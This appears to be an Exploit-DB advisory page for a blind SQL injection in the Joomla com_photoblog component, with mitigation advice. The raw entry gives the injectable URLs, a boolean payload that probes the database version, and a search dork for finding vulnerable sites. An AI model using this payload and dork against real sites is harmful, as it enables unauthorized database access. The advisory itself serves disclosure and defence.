Joomla (com_photoblog) Blind Sql Injection Vulnerability

vendor:

by:

ALTBTA

5.5

CVSS

MEDIUM

Blind SQL Injection

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Joomla (com_photoblog) Blind Sql Injection Vulnerability

The exploit allows an attacker to perform blind SQL injection in the Joomla component com_photoblog. It can be exploited through the URLs www.site.com/detail.php?id=[Blind SQL INJECTION] and www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and substring(@@version,1,1)=5.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by Joomla. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Joomla (com_photoblog) Blind Sql Injection Vulnerability
========================================================

####################################################################
.:. Author : ALTBTA [L_9@HoTmIL.CoM]
.:. Home : v4-team.com/cc<http://v4-team.com/cc>
.:. Script : Joomla
.:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_photoblog"

####################################################################

===[ Exploit ]===

www.site.com/detail.php?id=[Blind<http://www.site.com/detail.php?id=[Blind> SQL INJECTION]


www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and<http://www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and> substring(@@version,1,1)=5

####################################################################

Greats T0: aB0-3tH4b T3rR0r & RxH